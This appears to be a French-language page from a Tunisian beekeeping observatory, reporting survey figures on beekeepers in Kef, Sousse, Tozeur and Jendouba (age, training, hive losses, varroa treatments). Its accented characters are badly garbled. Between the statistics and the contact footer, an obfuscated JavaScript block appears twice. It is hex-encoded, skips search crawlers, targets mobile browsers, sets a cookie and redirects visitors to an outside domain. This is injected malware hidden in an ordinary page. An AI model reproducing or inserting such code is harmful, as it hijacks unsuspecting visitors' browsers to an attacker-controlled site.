Chiffres ClAi??s

RAi??partition selon l'A?ge

Kef

Sousse

On remarque que la majoritAi?? des apiculteurs sont A?gAi??s entre 40 et 60 ans reprAi??sentant ainsi 63% de la population enquA?tAi??e dans la rAi??gion de Sousse et 68% dans la rAi??gion du Kef. Les jeunes sont aussi intAi??resser par lai??i??apiculture avec un pourcentage important de lai??i??ordre de 36%.
100% de la population enquA?tAi??e dans la rAi??gion de Tozeur et Jendouba sont des jeunes.

RAi??partition selon le sexe

Jendouba

Kef

Le domaine apicole est Ai?? 100% masculin dans les rAi??gions du Sousse et Tozeur .tandis que les rAi??gions du Jendouba et du Kef ,la femme est prAi??sente dans ce domaine mais avec une reprAi??sentation faible qui ne dAi??passe pas 20 et 12% successivementdans les deux rAi??gions.

RAi??partition selon la professionnalitAi??

Touzer

Jendouba

Sousse

On remarque que les apiculteurs sont gAi??nAi??ralement professionnels. Puis avec des pourcentages moins Ai??levAi??s, on trouve des apiculteurs pluriactifs.
Lai??i??apiculture nai??i??est pratiquAi??e que par 22% des amateurs dans la rAi??gion de Sousse. Il est Ai?? noter que le pourcentage des apiculteurs professionnels est trA?s faible (18%) par apport aux apiculteurs amateurs (82%) dans la rAi??gion du Kef.

RAi??partition selon la formation des apiculteurs

Jendouba

Sousse

Kef

Pour la rAi??gion de Tozeur 100% des apiculteurs ont subi une formation dans lai??i??apiculture. Le taux de formation est aussi important dans le Kef avec 54% dai??i??apiculteurs formAi??s. Dans le reste des rAi??gions le taux des apiculteurs formAi??s reste toujours faible par rapport aux apiculteurs non formAi??s.

RAi??partition selon l'anciennetAi??

Jendouba

Touzer

Sousse

Kef

Les anciens apiculteurs prAi??sentent 50% des apiculteurs dans les rAi??gions de Sousse et Jendouba, ce taux est faible dans la rAi??gion du Kef. Les apiculteurs de Tozeur sont Ai?? 50% nouveaux dans ce domaine et l'autre moitiAi?? entre 5 et 20 ans d'expAi??rience dans le domaine apicole.

RAi??partition selon le nombre de ruche

Jendouba

Sousse

Touzer

Kef

Les ruches dans touts les rAi??gions sont Ai?? 100% modernes. Sauf un faible taux qui reprAi??sente 5% de ruches traditionnelles dans la rAi??gion du Kef . Les apiculteurs possAi??dant un nombre de ruches entre 20 et 100 prAi??sentent des taux Ai??levAi??s dans la plupart des rAi??gions.

RAi??partition selon le nombre de rucher

Sousse

Kef

Il nai??i??y a aucun intAi??rA?t de diviser les ruches sur des diffAi??rentes emplacements vu que la plupart des apiculteurs ont un seul rucher, mA?me ceux qui divisent leurs ruches ont plus que 2 ou 3 ruchers.

RAi??partition selon le transhumanse

Jendouba

Touzer

Sousse

Kef

Les graphiques montrent que la majoritAi?? sont des ruchers sAi??dentaires; les pourcentages sont proches dans toutes les rAi??gions.

RAi??partition selon l'essaimage

Jendouba

Sousse

Touzer

Kef

Presque la moitiAi?? des apiculteurs appliquent lai??i??essaimage artificiel dans les rAi??gions de Sousse, Tozeur et Jendouba. Lai??i??essaimage artificiel nai??i??est pas encore connu par les apiculteurs du Kef avec seulement 10% des apiculteurs qui le pratiquent.

RAi??partition selon le nourrissement

Kef

Touzer

Sousse

Pour le nourrissement les produits les plus utilisAi??s varient dai??i??une rAi??gion Ai?? une autre. Le sirop est le produit le plus utilisAi?? dans la rAi??gion du Kef avec un pourAi??entage de 87%, dans le reste la combinaison de sirop et pA?te est la mAi??thode la plus rAi??pondue. Sauf dans la rAi??gion de Jendouba oA? la totalitAi?? des apicultures utilise la pA?te pour le nourrissement.
Il est Ai?? noter que 32% dai??i??apiculteurs du Kef ne pratiquent pas le nourrissement.

RAi??partition selon le taux de perte des ruches

Sousse

Touzer

Kef

Les taux de perte sont gAi??nAi??ralement situAi??s entre 10 et 30% du rucher. Mais il faut noter que dans certaines rAi??gions, les taux dAi??passant 60% du rucher perdues sont importants, ils sont atteints 15% dans la rAi??gion du Kef, 22% en Sousse et 20% dans Tozeur.

RAi??partition selon les causes de perte

Sousse

Kef

Le climat est Ai?? 100% lai??i??agent responsable des pertes des ruches dans les rAi??gions de Jendouba et Tozeur. La carence alimentaire intervient aussi dans les pertes de ruches dans la rAi??gion de Sousse par 14%.
Pour la rAi??gion du Kef les causes des pertes sont un peu plus diversifiAi??es dont 68% des causes climatiques, 15,5% provoquAi??es par la maladie, 8,8% de prAi??dation et dai??i??autre causes prAi??sentant 6,6%.

RAi??partition selon le traitement contre varroa

Sousse

Kef

67% des apiculteurs de Sousse pratiquent le traitement contre le varroa et dans la rAi??gion du Kef 40% d'eux appliquent aussi le traitement. Pour les autres rAi??gions le traitement contre le varroa est appliquer mais avec un pourcentage faible des apiculteurs.

RAi??partition selon Les produits utilisAi??s contre le varroa

Sousse

Kef

Le produit le plus connue est lai??i??apiguard avec 58% en Sousse et 43% dans le Kef. Puis lai??i??apiston avec 49% dans le Kef et lai??i??acide formique avec 25% dans la rAi??gion de Sousse, il y a des autres produits comme le Tactik et lai??i??Apivar par des faibles taux dai??i??usage.

RAi??partition selon la production

Jandouba

Sousse

Kef

Touzer

RAi??partition selon le type de miel

Le miel produit dans la plupart des rAi??gions soit multifleurs avec un taux important de miel dai??i??eucalyptus et de romarins.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

À propos de nous

Institut National Agronomique de Tunisie Institut d’Études Universitaires fondé en 1898, c’est la plus ancienne école d’ingénierie agronome de Tunisie et d’Afrique. L’Institut est régi conjointement par le Ministère de l’Agriculture et des Ressources en Eau et le Ministère de l'Enseignement Supérieur, de la Recherche Scientifique et de la Technologie. Avec plus de 4 000 ingénieurs agronomes diplômés, la mission de l’INAT, outre la formation des ingénieurs, englobe la recherche, grâce à un cursus universitaire qui propose de nombreux Masters et Thèses. Plusieurs travaux de recherche ont été réalisés sur la biologie, la génétique et les pathologies de l'Abeille .

Informations de contact

Observatoire méditerranéen de l'apiculture
43 avenue Charles Nicolle 1082 Tunis
Phone: +(216)71 84 02 70
Fax: +(216)71 79 93 91
Email: information@apiculture.tn
l’Union européenne
“Ce projet est financé par l’Union européenne"

Localisation